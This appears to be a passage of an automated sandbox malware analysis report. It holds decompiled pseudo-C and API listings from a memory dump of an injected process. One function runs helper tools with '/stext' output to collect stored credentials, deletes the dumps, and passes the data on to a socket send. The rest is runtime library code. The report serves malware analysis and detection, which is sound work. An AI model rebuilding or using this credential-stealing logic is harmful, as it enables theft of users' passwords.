                								_t238 = _t237 | E004516F4(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t237,  &_v28, 1,  *((intOrPtr*)(_t210 + 0xac)), 0x14, _v8 + 0x10);
                								_t239 = _t238 | E004516F4(_t210, _t224,  *((intOrPtr*)(_t210 + 0xac)), _t238,  &_v28, 1, _t233, 0x16, _v8 + 0x14);
                								_t240 = _t239 | E004516F4(_t210, _t224, _t233, _t239,  &_v28, 1, _t233, 0x17, _v8 + 0x18);
                								_v20 = _v8 + 0x1c;
                								_t241 = _t240 | E004516F4(_t210, _t224, _t233, _t240,  &_v28, 1, _t233, 0x18, _v8 + 0x1c);
                								_t242 = _t241 | E004516F4(_t210, _t224, _t233, _t241,  &_v28, 1, _t233, 0x50, _v8 + 0x20);
                								_t243 = _t242 | E004516F4(_t210, _t224, _t233, _t242,  &_v28, 1, _t233, 0x51, _v8 + 0x24);
                								_t244 = _t243 | E004516F4(_t210, _t224, _t233, _t243,  &_v28, 0, _t233, 0x1a, _v8 + 0x28);
                								_t245 = _t244 | E004516F4(_t210, _t224, _t233, _t244,  &_v28, 0, _t233, 0x19, _v8 + 0x29);
                								_t246 = _t245 | E004516F4(_t210, _t224, _t233, _t245,  &_v28, 0, _t233, 0x54, _v8 + 0x2a);
                								_t247 = _t246 | E004516F4(_t210, _t224, _t233, _t246,  &_v28, 0, _t233, 0x55, _v8 + 0x2b);
                								_t248 = _t247 | E004516F4(_t210, _t224, _t233, _t247,  &_v28, 0, _t233, 0x56, _v8 + 0x2c);
                								_t249 = _t248 | E004516F4(_t210, _t224, _t233, _t248,  &_v28, 0, _t233, 0x57, _v8 + 0x2d);
                								_t250 = _t249 | E004516F4(_t210, _t224, _t233, _t249,  &_v28, 0, _t233, 0x52, _v8 + 0x2e);
                								_t251 = _t250 | E004516F4(_t210, _t224, _t233, _t250,  &_v28, 0, _t233, 0x53, _v8 + 0x2f);
                								_t252 = _t251 | E004516F4(_t210, _t224, _t233, _t251,  &_v28, 2, _t233, 0x15, _v8 + 0x38);
                								_t253 = _t252 | E004516F4(_t210, _t224, _t233, _t252,  &_v28, 2, _t233, 0x14, _v8 + 0x3c);
                								_t254 = _t253 | E004516F4(_t210, _t224, _t233, _t253,  &_v28, 2, _t233, 0x16, _v8 + 0x40);
                								_t255 = _t254 | E004516F4(_t210, _t224, _t233, _t254,  &_v28, 2, _t233, 0x17, _v8 + 0x44);
                								_t256 = _t255 | E004516F4(_t210, _t224, _t233, _t255,  &_v28, 2, _t233, 0x50, _v8 + 0x48);
                								if((E004516F4(_t210, _t224, _t233, _t256,  &_v28, 2, _t233, 0x51, _v8 + 0x4c) | _t256) == 0) {
                									_t226 =  *_v20;
                									while( *_t226 != 0) {
                										_t195 =  *_t226;
                										if(_t195 < 0x30 || _t195 > 0x39) {
                											if(_t195 != 0x3b) {
                												goto L17;
                											}
                											_t257 = _t226;
                											do {
                												 *_t257 =  *((intOrPtr*)(_t257 + 1));
                												_t257 = _t257 + 1;
                											} while ( *_t257 != 0);
                										} else {
                											 *_t226 = _t195 - 0x30;
                											L17:
                											_t226 = _t226 + 1;
                										}
                									}
                									goto L25;
                								}
                								E0044ED82(_v8);
                								E00445002(_v8);
                								E00445002(_v12);
                								E00445002(_v16);
                								goto L4;
                							}
                							E00445002(_t234);
                							E00445002(_v12);
                							L7:
                							goto L4;
                						}
                						E00445002(_t234);
                						goto L7;
                					}
                					L4:
                					return 1;
                				} else {
                					_t231 = 0;
                					_v12 = 0;
                					_t236 = 0x46f188;
                					L27:
                					_t105 =  *(_t210 + 0x84);
                					if(_t105 != 0) {
                						asm("lock dec dword [eax]");
                					}
                					if( *((intOrPtr*)(_t210 + 0x7c)) != 0) {
                						asm("lock xadd [ecx], eax");
                						if((_t105 | 0xffffffff) == 0) {
                							E00445002( *(_t210 + 0x88));
                							E00445002( *((intOrPtr*)(_t210 + 0x7c)));
                						}
                					}
                					 *((intOrPtr*)(_t210 + 0x7c)) = _v12;
                					 *(_t210 + 0x84) = _t231;
                					 *(_t210 + 0x88) = _t236;
                					return 0;
                				}
                			}

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: _free
                • String ID:
                • API String ID: 269201875-0
                • Opcode ID: 81053f9c94f3d198c50d80b60ac2f365dac252c2faa5b35674da0a71a95d3b8d
                • Instruction ID: f43520f85eab2823aefddca190de3c75bdb19f5807818d4f337798dcfd7c07fb
                • Opcode Fuzzy Hash: 81053f9c94f3d198c50d80b60ac2f365dac252c2faa5b35674da0a71a95d3b8d
                • Instruction Fuzzy Hash: 18C14476E40205AFEB20DBA9CC42FEF77F8AB18704F14416AFA04FB286D6749D458764
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 95%
                			E00411FF7() {
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				void* _t165;
                				void* _t168;
                				void* _t174;
                				void* _t180;
                				void* _t186;
                				void* _t192;
                				void* _t198;
                				void* _t212;
                				void* _t217;
                				void* _t222;
                				void* _t223;
                				void* _t254;
                				void* _t255;
                				void* _t291;
                				void* _t292;
                				void* _t293;
                				void* _t294;
                				char _t298;
                				intOrPtr _t300;
                				void* _t474;
                				void* _t494;
                				void* _t500;
                				void* _t504;
                				void* _t505;
                				void* _t506;
                				void* _t507;
                				intOrPtr _t519;
                
                				GetModuleFileNameW(0, _t505 + 0x178, 0x104);
                				E004020BF(_t291, _t505 + 0xf8);
                				E004020BF(_t291, _t505 + 0xe0);
                				E004020BF(_t291, _t505 + 0xc8);
                				_t494 = Sleep;
                				_t504 = 0;
                				do {
                					 *((char*)(_t505 + 0x1b)) = 0;
                					 *((char*)(_t505 + 0x19)) = 0;
                					 *((char*)(_t505 + 0x1a)) = 0;
                					E0040CEEC(_t505 + 0xb4, 0x30, E00401F8B(E0041A4D3(_t505 + 0x1c)));
                					E00401FB8();
                					E0040CEEC(_t505 + 0x9c, 0x30, E00401F8B(E0041A4D3(_t505 + 0x1c)));
                					E00401FB8();
                					_t165 = E00401F8B(E0041A4D3(_t505 + 0x1c));
                					_t459 = 0x30;
                					E0040CEEC(_t505 + 0x84, 0x30, _t165);
                					E00401FB8();
                					_t292 = 0;
                					while(1) {
                						_t168 = E00401F8B(_t505 + 0x3c8);
                						_t174 = E00401EE4(E00402FF4(_t292, _t505 + 0x20, E004042FD(_t292, _t505 + 0x58, E004042DC(_t292, _t505 + 0x74, _t505 + 0x194, _t504, 0, E0040415E(_t292, _t505 + 0x38, _t459, _t504, L" /stext \"")), _t504, 0, _t505 + 0xb4), _t494, _t504, 0, "\""));
                						_t459 = _t168;
                						 *((char*)(_t505 + 0x16)) = E00417456(_t174);
                						E00401EE9();
                						E00401EE9();
                						E00401EE9();
                						E00401EE9();
                						if( *((char*)(_t505 + 0x16)) != 0) {
                							break;
                						}
                						Sleep(0xa);
                						_t292 = _t292 + 1;
                						if(_t292 < 0xa) {
                							continue;
                						}
                						break;
                					}
                					_t293 = 0;
                					while(1) {
                						_t180 = E00401F8B(_t505 + 0x3f8);
                						_t186 = E00401EE4(E00402FF4(_t293, _t505 + 0x3c, E004042FD(_t293, _t505 + 0x70, E004042DC(_t293, _t505 + 0x5c, _t505 + 0x194, _t504, 0, E0040415E(_t293, _t505 + 0x1c, _t459, _t504, L" /stext \"")), _t504, 0, _t505 + 0x9c), _t494, _t504, 0, "\""));
                						_t459 = _t180;
                						 *((char*)(_t505 + 0x18)) = E00417456(_t186);
                						E00401EE9();
                						E00401EE9();
                						E00401EE9();
                						E00401EE9();
                						if( *((char*)(_t505 + 0x18)) != 0) {
                							break;
                						}
                						Sleep(0xa);
                						_t293 = _t293 + 1;
                						if(_t293 < 0xa) {
                							continue;
                						}
                						break;
                					}
                					_t294 = 0;
                					while(1) {
                						_t192 = E00401F8B(_t505 + 0x3e0);
                						_t198 = E00401EE4(E00402FF4(_t294, _t505 + 0x3c, E004042FD(_t294, _t505 + 0x70, E004042DC(_t294, _t505 + 0x5c, _t505 + 0x194, _t504, 0, E0040415E(_t294, _t505 + 0x1c, _t459, _t504, L" /stext \"")), _t504, 0, _t505 + 0x84), _t494, _t504, 0, "\""));
                						_t459 = _t192;
                						 *((char*)(_t505 + 0x17)) = E00417456(_t198);
                						E00401EE9();
                						E00401EE9();
                						E00401EE9();
                						E00401EE9();
                						if( *((char*)(_t505 + 0x17)) != 0) {
                							break;
                						}
                						Sleep(0xa);
                						_t294 = _t294 + 1;
                						if(_t294 < 0xa) {
                							continue;
                						}
                						break;
                					}
                					_t519 =  *((intOrPtr*)(_t505 + 0x16));
                					_t60 = (0 | _t519 == 0x00000000) + 1; // 0x1
                					_t62 = ( !=  ? _t519 == 0 : _t60) + 1; // 0x2
                					_t296 =  !=  ?  !=  ? _t519 == 0 : _t60 : _t62;
                					_t500 = 0;
                					 *((intOrPtr*)(_t505 + 0x34)) =  !=  ?  !=  ? _t519 == 0 : _t60 : _t62;
                					while(1) {
                						E00401EE4(_t505 + 0xb0);
                						if(E0041ADFE(_t505 + 0xf8) != 0) {
                							DeleteFileW(E00401EE4(_t505 + 0xb0));
                						}
                						E00401EE4(_t505 + 0x80);
                						if(E0041ADFE(_t505 + 0xe0) == 0) {
                							_t298 =  *((intOrPtr*)(_t505 + 0x19));
                						} else {
                							_t298 = 1;
                							 *((char*)(_t505 + 0x19)) = 1;
                							DeleteFileW(E00401EE4(_t505 + 0x80));
                						}
                						E00401EE4(_t505 + 0x98);
                						_t471 = _t505 + 0xc8;
                						if(E0041ADFE(_t505 + 0xc8) != 0) {
                							 *((char*)(_t505 + 0x1a)) = 1;
                							DeleteFileW(E00401EE4(_t505 + 0x98));
                						}
                						if(_t298 != 0 && _t298 != 0 &&  *((char*)(_t505 + 0x1a)) != 0) {
                							break;
                						}
                						Sleep(0x1f4);
                						_t500 = _t500 + 1;
                						if(_t500 < 0xa) {
                							continue;
                						}
                						break;
                					}
                					_t212 = E0040619C();
                					_t300 =  *((intOrPtr*)(_t505 + 0x34));
                					if(_t212 == 0 || E0040619C() == 0 || E0040619C() == 0) {
                						E00401EE9();
                						E00401EE9();
                						E00401EE9();
                					} else {
                						goto L25;
                					}
                					L28:
                					E0040AE7E(_t300, _t505 + 0x118, _t471, _t494, _t504, 0x2710, 0);
                					_t217 = E00401EE4(_t505 + 0x110);
                					_t506 = _t505 - 0x18;
                					E004020D6(_t300, _t506, _t471, _t533, _t506 + 0x428);
                					E00412770(_t506 + 0x50, _t217, _t217, _t504);
                					_t507 = _t506 + 0x18;
                					E00401EE9();
                					_t222 = E00405AE5("0");
                					_t474 = _t507 + 0x110;
                					_t534 = _t222;
                					if(_t222 == 0) {
                						_t223 = E0041A879(_t300, _t507 + 0x1c, _t474);
                						E00402E81(_t508, E00402EF0(_t300, _t508 + 0x190, E00402EF0(_t300, _t508 + 0x17c, E00402EF0(_t300, _t508 + 0x168, E00402EF0(_t300, _t508 + 0x154, E00402EF0(_t300, _t508 + 0x68, E00402EF0(_t300, _t508 + 0x9c, E00402F11(_t507 - 0x18 + 0x68, _t507 - 0x18 + 0x3c8, _t504, 0x472ec8), _t504, __eflags, _t508 + 0x128), _t504, __eflags, 0x472ec8), _t504, __eflags, _t508 + 0x108), _t504, __eflags, 0x472ec8), _t504, __eflags, _t508 + 0xe8), _t504, __eflags, 0x472ec8), _t223);
                						_push(0x6a);
                						E00404A81(0x473388, _t233, __eflags);
                						E00401FB8();
                						E00401FB8();
                						E00401FB8();
                						E00401FB8();
                						E00401FB8();
                						E00401FB8();
                						E00401FB8();
                					} else {
                						_t254 = E0041A879(_t300, _t507 + 0x170, _t474);
                						_t508 = _t507 - 0x18;
                						_t255 = E0041A6E9(_t300, _t507 - 0x18 + 0x170, _t300);
                						E00402E81(_t508, E00402EF0(_t300, _t508 + 0x58, E00402E81(_t508 + 0x8c, E00402EF0(_t300, _t508 + 0x78, E00402EF0(_t300, _t508 + 0x48, E00402EF0(_t300, _t508 + 0xe0, E00402EF0(_t300, _t508 + 0xcc, E00402EF0(_t300, _t508 + 0xb8, E00402EF0(_t300, _t508 + 0x164, E00402F11(_t508 + 0x180, _t508 + 0x3f0, _t504, 0x472ec8), _t504, _t534, _t508 + 0x130), _t504, _t534, 0x472ec8), _t504, _t534, _t508 + 0x110), _t504, _t534, 0x472ec8), _t504, _t534, _t508 + 0xf0), _t504, _t534, 0x472ec8), _t255), _t504, _t534, 0x472ec8), _t254);
                						_push(0x69);
                						E00404A81(0x473388, _t267, _t534);
                						E00401FB8();
                						E00401FB8();
                						E00401FB8();
                						E00401FB8();
                						E00401FB8();
                						E00401FB8();
                						E00401FB8();
                						E00401FB8();
                						E00401FB8();
                						E00401FB8();
                					}
                					E00401FB8();
                					E00401EE9();
                					E00401FB8();
                					E00401FB8();
                					E00401FB8();
                					E00401FB8();
                					E00401FB8();
                					E00401FB8();
                					E00401FB8();
                					E00401FB8();
                					return E00401FB8();
                					L25:
                					Sleep(0x64);
                					E00401EE9();
                					E00401EE9();
                					E00401EE9();
                					_t504 = _t504 + 1;
                					_t533 = _t504 - 0xa;
                				} while (_t504 < 0xa);
                				goto L28;
                			}


                APIs
                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412010
                  • Part of subcall function 0041A4D3: GetCurrentProcessId.KERNEL32(00000000,7476FBB0,00000000,?,?,?,?,0046A8F0,0040C716,.vbs,?,?,?,?,?,00473238), ref: 0041A4FA
                  • Part of subcall function 00417456: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00463E44), ref: 0041746C
                  • Part of subcall function 00417456: CloseHandle.KERNEL32(D>F,?,?,004040D5,00463E44), ref: 00417475
                • Sleep.KERNEL32(0000000A,00463E44), ref: 00412162
                • Sleep.KERNEL32(0000000A,00463E44,00463E44), ref: 00412204
                • Sleep.KERNEL32(0000000A,00463E44,00463E44,00463E44), ref: 004122A6
                • DeleteFileW.KERNEL32(00000000,00463E44,00463E44,00463E44), ref: 00412308
                • DeleteFileW.KERNEL32(00000000,00463E44,00463E44,00463E44), ref: 0041233F
                • DeleteFileW.KERNEL32(00000000,00463E44,00463E44,00463E44), ref: 0041237B
                • Sleep.KERNEL32(000001F4,00463E44,00463E44,00463E44), ref: 00412395
                • Sleep.KERNEL32(00000064), ref: 004123D7
                  • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                • String ID: /stext "
                • API String ID: 1223786279-3856184850
                • Opcode ID: 62e8ad8a7ebeb560cf04e09332c1e85e5a03159076cac99f94857d822d4bee3e
                • Instruction ID: fc4ad0b7eed9c60d5fc35351bb25392cbbf70f9ec0b82e477513c0ff0abfdd60
                • Opcode Fuzzy Hash: 62e8ad8a7ebeb560cf04e09332c1e85e5a03159076cac99f94857d822d4bee3e
                • Instruction Fuzzy Hash: A70246315083414AC328FB61D891AEFB3D5AFD4348F50493FF48A931E2EF789A49C65A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 41%
                			E004544DC(void* __ecx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
                				signed int _v5;
                				char _v6;
                				void* _v12;
                				signed int _v16;
                				signed int _v20;
                				char _v24;
                				intOrPtr _v36;
                				signed int _v44;
                				void _v48;
                				char _v72;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				signed int _t114;
                				signed int _t123;
                				signed char _t124;
                				signed int _t134;
                				intOrPtr _t164;
                				intOrPtr _t180;
                				signed int* _t190;
                				signed int _t192;
                				char _t197;
                				signed int _t203;
                				signed int _t206;
                				signed int _t215;
                				signed int _t217;
                				signed int _t219;
                				signed int _t225;
                				signed int _t227;
                				signed int _t234;
                				signed int _t235;
                				signed int _t237;
                				signed int _t239;
                				signed char _t242;
                				intOrPtr _t245;
                				void* _t248;
                				void* _t252;
                				void* _t262;
                				signed int _t263;
                				signed int _t266;
                				signed int _t269;
                				signed int _t270;
                				void* _t272;
                				void* _t274;
                				void* _t275;
                				void* _t277;
                				void* _t278;
                				void* _t280;
                				void* _t284;
                
                				_t262 = E0045423F(__ecx,  &_v72, _a16, _a20, _a24);
                				_t192 = 6;
                				memcpy( &_v48, _t262, _t192 << 2);
                				_t274 = _t272 + 0x1c;
                				_t248 = _t262 + _t192 + _t192;
                				_t263 = _t262 | 0xffffffff;
                				if(_v36 != _t263) {
                					_t114 = E0044EB75(_t248, _t263, __eflags);
                					_t190 = _a8;
                					 *_t190 = _t114;
                					__eflags = _t114 - _t263;
                					if(_t114 != _t263) {
                						_v20 = _v20 & 0x00000000;
                						_v24 = 0xc;
                						_t275 = _t274 - 0x18;
                						 *_a4 = 1;
                						_push(6);
                						_v16 =  !(_a16 >> 7) & 1;
                						_push( &_v24);
                						_push(_a12);
                						memcpy(_t275,  &_v48, 1 << 2);
                						_t197 = 0;
                						_t252 = E004541AA();
                						_t277 = _t275 + 0x2c;
                						_v12 = _t252;
                						__eflags = _t252 - 0xffffffff;
                						if(_t252 != 0xffffffff) {
                							L11:
                							_t123 = GetFileType(_t252);
                							__eflags = _t123;
                							if(_t123 != 0) {
                								__eflags = _t123 - 2;
                								if(_t123 != 2) {
                									__eflags = _t123 - 3;
                									_t124 = _v48;
                									if(_t123 == 3) {
                										_t124 = _t124 | 0x00000008;
                										__eflags = _t124;
                									}
                								} else {
                									_t124 = _v48 | 0x00000040;
                								}
                								_v5 = _t124;
                								E0044EABE(_t197,  *_t190, _t252);
                								_t242 = _v5 | 0x00000001;
                								_v5 = _t242;
                								_v48 = _t242;
                								 *( *((intOrPtr*)(0x470810 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) = _t242;
                								_t203 =  *_t190;
                								_t205 = (_t203 & 0x0000003f) * 0x30;
                								__eflags = _a16 & 0x00000002;
                								 *((char*)( *((intOrPtr*)(0x470810 + (_t203 >> 6) * 4)) + 0x29 + (_t203 & 0x0000003f) * 0x30)) = 0;
                								if((_a16 & 0x00000002) == 0) {
                									L20:
                									_v6 = 0;
                									_push( &_v6);
                									_push(_a16);
                									_t278 = _t277 - 0x18;
                									_t206 = 6;
                									_push( *_t190);
                									memcpy(_t278,  &_v48, _t206 << 2);
                									_t134 = E00453F5D(_t190,  &_v48 + _t206 + _t206,  &_v48);
                									_t280 = _t278 + 0x30;
                									__eflags = _t134;
                									if(__eflags == 0) {
                										 *((char*)( *((intOrPtr*)(0x470810 + ( *_t190 >> 6) * 4)) + 0x29 + ( *_t190 & 0x0000003f) * 0x30)) = _v6;
                										 *( *((intOrPtr*)(0x470810 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x470810 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x470810 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30)) & 0x00000001;
                										__eflags = _v5 & 0x00000048;
                										if((_v5 & 0x00000048) == 0) {
                											__eflags = _a16 & 0x00000008;
                											if((_a16 & 0x00000008) != 0) {
                												_t225 =  *_t190;
                												_t227 = (_t225 & 0x0000003f) * 0x30;
                												_t164 =  *((intOrPtr*)(0x470810 + (_t225 >> 6) * 4));
                												_t87 = _t164 + _t227 + 0x28;
                												 *_t87 =  *(_t164 + _t227 + 0x28) | 0x00000020;
                												__eflags =  *_t87;
                											}
                										}
                										_t266 = _v44;
                										__eflags = (_t266 & 0xc0000000) - 0xc0000000;
                										if((_t266 & 0xc0000000) != 0xc0000000) {
                											L31:
                											__eflags = 0;
                											return 0;
                										} else {
                											__eflags = _a16 & 0x00000001;
                											if((_a16 & 0x00000001) == 0) {
                												goto L31;
                											}
                											CloseHandle(_v12);
                											_v44 = _t266 & 0x7fffffff;
                											_t215 = 6;
                											_push( &_v24);
                											_push(_a12);
                											memcpy(_t280 - 0x18,  &_v48, _t215 << 2);
                											_t245 = E004541AA();
                											__eflags = _t245 - 0xffffffff;
                											if(_t245 != 0xffffffff) {
                												_t217 =  *_t190;
                												_t219 = (_t217 & 0x0000003f) * 0x30;
                												__eflags = _t219;
                												 *((intOrPtr*)( *((intOrPtr*)(0x470810 + (_t217 >> 6) * 4)) + _t219 + 0x18)) = _t245;
                												goto L31;
                											}
                											E0043EE77(GetLastError());
                											 *( *((intOrPtr*)(0x470810 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x470810 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
                											E0044EC87( *_t190);
                											L10:
                											goto L2;
                										}
                									}
                									_t269 = _t134;
                									goto L22;
                								} else {
                									_t269 = E004543BB(_t205,  *_t190);
                									__eflags = _t269;
                									if(__eflags != 0) {
                										L22:
                										E0044A5EC(__eflags,  *_t190);
                										return _t269;
                									}
                									goto L20;
                								}
                							}
                							_t270 = GetLastError();
                							E0043EE77(_t270);
                							 *( *((intOrPtr*)(0x470810 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x470810 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
                							CloseHandle(_t252);
                							__eflags = _t270;
                							if(_t270 == 0) {
                								 *((intOrPtr*)(E0043EEAD())) = 0xd;
                							}
                							goto L2;
                						}
                						_t234 = _v44;
                						__eflags = (_t234 & 0xc0000000) - 0xc0000000;
                						if((_t234 & 0xc0000000) != 0xc0000000) {
                							L9:
                							_t235 =  *_t190;
                							_t237 = (_t235 & 0x0000003f) * 0x30;
                							_t180 =  *((intOrPtr*)(0x470810 + (_t235 >> 6) * 4));
                							_t33 = _t180 + _t237 + 0x28;
                							 *_t33 =  *(_t180 + _t237 + 0x28) & 0x000000fe;
                							__eflags =  *_t33;
                							E0043EE77(GetLastError());
                							goto L10;
                						}
                						__eflags = _a16 & 0x00000001;
                						if((_a16 & 0x00000001) == 0) {
                							goto L9;
                						}
                						_t284 = _t277 - 0x18;
                						_v44 = _t234 & 0x7fffffff;
                						_t239 = 6;
                						_push( &_v24);
                						_push(_a12);
                						memcpy(_t284,  &_v48, _t239 << 2);
                						_t197 = 0;
                						_t252 = E004541AA();
                						_t277 = _t284 + 0x2c;
                						_v12 = _t252;
                						__eflags = _t252 - 0xffffffff;
                						if(_t252 != 0xffffffff) {
                							goto L11;
                						}
                						goto L9;
                					} else {
                						 *(E0043EE9A()) =  *_t186 & 0x00000000;
                						 *_t190 = _t263;
                						 *((intOrPtr*)(E0043EEAD())) = 0x18;
                						goto L2;
                					}
                				} else {
                					 *(E0043EE9A()) =  *_t188 & 0x00000000;
                					 *_a8 = _t263;
                					L2:
                					return  *((intOrPtr*)(E0043EEAD()));
                				}
                			}

                0x004547a8
                0x004547ad
                0x004547b0
                0x004547e4
                0x004547ee
                0x004547ee
                0x004547f8
                0x00000000
                0x004547f8
                0x004547b9
                0x004547d2
                0x004547d9
                0x004545fc
                0x00000000
                0x004545fc
                0x00454771
                0x004546ee
                0x00000000
                0x004546ba
                0x004546c1
                0x004546c4
                0x004546c6
                0x004546f0
                0x004546f2
                0x00000000
                0x004546f8
                0x00000000
                0x004546c6
                0x004546b8
                0x00454613
                0x00454616
                0x00454631
                0x00454636
                0x0045463c
                0x0045463e
                0x00454649
                0x00454649
                0x00000000
                0x0045463e
                0x00454597
                0x0045459e
                0x004545a0
                0x004545d7
                0x004545d7
                0x004545e1
                0x004545e4
                0x004545eb
                0x004545eb
                0x004545eb
                0x004545f7
                0x00000000
                0x004545f7
                0x004545a2
                0x004545a6
                0x00000000
                0x00000000
                0x004545a8
                0x004545b7
                0x004545bc
                0x004545bf
                0x004545c0
                0x004545c3
                0x004545c3
                0x004545ca
                0x004545cc
                0x004545cf
                0x004545d2
                0x004545d5
                0x00000000
                0x00000000
                0x00000000
                0x00454535
                0x0045453a
                0x0045453d
                0x00454544
                0x00000000
                0x00454544
                0x0045450e
                0x00454513
                0x00454519
                0x0045451b
                0x00000000
                0x00454520

                APIs
                  • Part of subcall function 004541AA: CreateFileW.KERNEL32(00000000,00000000,?,00454585,?,?,00000000,?,00454585,00000000,0000000C), ref: 004541C7
                • GetLastError.KERNEL32 ref: 004545F0
                • __dosmaperr.LIBCMT ref: 004545F7
                • GetFileType.KERNEL32(00000000), ref: 00454603
                • GetLastError.KERNEL32 ref: 0045460D
                • __dosmaperr.LIBCMT ref: 00454616
                • CloseHandle.KERNEL32(00000000), ref: 00454636
                • CloseHandle.KERNEL32(?), ref: 00454780
                • GetLastError.KERNEL32 ref: 004547B2
                • __dosmaperr.LIBCMT ref: 004547B9
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                • String ID: H
                • API String ID: 4237864984-2852464175
                • Opcode ID: fdd6ef0341d715ca66b4f226cea273408d1dce2abc93341c621d467a1a4981a0
                • Instruction ID: e7023db14128a88f38c155e4c92a359c255939900931c8e81202aef98a64c706
                • Opcode Fuzzy Hash: fdd6ef0341d715ca66b4f226cea273408d1dce2abc93341c621d467a1a4981a0
                • Instruction Fuzzy Hash: 49A148319141089FDF199F68DC517AE3BA0AF4A329F14015EFC11DF392D7388856CB9A
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 38%
                			E00413EF7(char _a4, signed short _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, signed char _a28) {
                				intOrPtr _v0;
                				short _v4;
                				char _v8;
                				char* _v12;
                				signed short _v20;
                				intOrPtr _v24;
                				char _t36;
                				short _t37;
                				intOrPtr* _t44;
                				void* _t47;
                				void* _t49;
                				char* _t52;
                				signed short* _t58;
                				signed char _t63;
                				intOrPtr _t64;
                				signed short _t69;
                				void* _t71;
                				void* _t72;
                				intOrPtr _t73;
                				intOrPtr* _t74;
                				intOrPtr _t76;
                				void* _t77;
                
                				_t77 =  &_v12;
                				_t36 =  *((intOrPtr*)("65535")); // 0x33353536
                				_v8 = _t36;
                				_t37 =  *0x46a5f0; // 0x35
                				_t74 = _a4;
                				_v4 = _t37;
                				_v12 =  &_v8;
                				if(_t74 == 0 || _a8 < 0x10) {
                					L42:
                					return 0x2afb;
                				} else {
                					_t71 = 2;
                					if( *_t74 != _t71) {
                						return 0x273f;
                					}
                					_t76 = _a24;
                					_t64 = _a20;
                					_t73 = _a16;
                					if(_a12 == 0 || _t73 == 0) {
                						if(_t64 == 0 || _t76 == 0) {
                							return 0x2af9;
                						} else {
                							goto L8;
                						}
                					} else {
                						L8:
                						_t63 = _a28;
                						_t42 = _t63 & 0x00000006;
                						if((_t63 & 0x00000006) != 6) {
                							if(_t64 == 0 || _t76 == 0) {
                								L21:
                								if(_a12 == 0 || _t73 == 0) {
                									L40:
                									return 0;
                								} else {
                									_t44 =  *((intOrPtr*)(_t74 + 4));
                									_a4 = _t44;
                									if((_t63 & 0x00000002) == 0) {
                										_t44 =  &_a4;
                										__imp__#51(_t44, 4, _t71);
                										if(_t44 == 0) {
                											L30:
                											if((_t63 & 0x00000004) == 0) {
                												_push(_v8);
                												L37:
                												__imp__#12();
                												_t75 = _t44;
                												L38:
                												if(_t73 <= E00439290(_t75)) {
                													goto L42;
                												}
                												E0044030E(_v4, _t73, _t75);
                												goto L40;
                											}
                											__imp__#111();
                											_t47 = _t44 - 0x2af9;
                											if(_t47 == 0) {
                												L34:
                												return 0x2af9;
                											}
                											_t49 = _t47 - 1;
                											if(_t49 == 0) {
                												return 0x2afa;
                											}
                											if(_t49 == 1) {
                												goto L42;
                											}
                											goto L34;
                										}
                										_t75 =  *_t44;
                										if( *_t44 == 0) {
                											goto L30;
                										}
                										if((_t63 & 0x00000001) != 0) {
                											_t52 = L00413895(_t75, 0x2e);
                											if(_t52 != 0) {
                												 *_t52 = 0;
                											}
                										}
                										goto L38;
                									}
                									_push(_t44);
                									goto L37;
                								}
                							} else {
                								_t69 =  *(_t74 + 2) & 0x0000ffff;
                								_a8 = _t69;
                								if((_t63 & 0x00000008) == 0) {
                									_t72 = 0;
                									_t54 =  ==  ? _t72 : "udp";
                									_t42 = _t69 & 0x0000ffff;
                									__imp__#56(_t42,  ==  ? _t72 : "udp");
                									if(_t42 == 0) {
                										L17:
                										_push(_v0);
                										L18:
                										__imp__#15();
                										E0041391A( &_v20, 6, "%u", _t42 & 0x0000ffff);
                										_t58 =  &_v20;
                										_t77 = _t77 + 0x10;
                										L19:
                										if(_t76 <= E00439290(_t58)) {
                											goto L42;
                										}
                										E0044030E(_a8, _t76, _v24);
                										_t77 = _t77 + 0xc;
                										_t71 = 2;
                										goto L21;
                									}
                									_t42 =  *_t42;
                									if(_t42 == 0) {
                										goto L17;
                									}
                									_v20 = _t42;
                									goto L19;
                								}
